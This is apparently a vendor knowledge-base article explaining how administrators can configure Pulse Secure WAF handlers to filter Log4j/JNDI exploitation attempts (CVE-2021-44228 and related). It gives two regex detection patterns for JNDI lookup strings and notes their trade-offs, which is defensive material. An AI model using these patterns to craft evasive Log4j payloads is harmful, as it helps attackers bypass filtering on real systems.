KB44944 - Can PulseSecure Web Application Firewall Module help protect against log4j/jndi vunerabilities?

Log4j project has published several security advisories related to JNDI interface, as described in on Apache foundation website and in our KB article KB44933 - including:

- CVE-2021-4104
- CVE-2021-44228
- CVE-2021-45046
- CVE-2021-45105

Can WAF help protect against this?

Our developer team is working on this, with updated WAF baseline expected soon.

Meanwhile, administrator that wants WAF to filter out log4j vulnerability right now, can add following custom handlers under the appropriate application:

- InvalidURLHandler (set invalid_url_pattern)

- RequestHeaderHandler (set invalid_header_pattern)

- RequiredHeaderFieldHandler (set invalid_header_pattern)

Pattern for both of above could be:

.*(\$|%24)({|%7[bB])(j|J|%6[aA]|%4[aA]|\$|%24).*(}|%7[dD]).*

...or...
 

.*\${.*:.*}.*

Former has low chance of false-positives, but only protect from RCE (i.e. DoS CVE-2021-45105 is let through). Latter catches all log4j vectors known so far (both RCE and DoS), but with slightly higher chance of false-positives.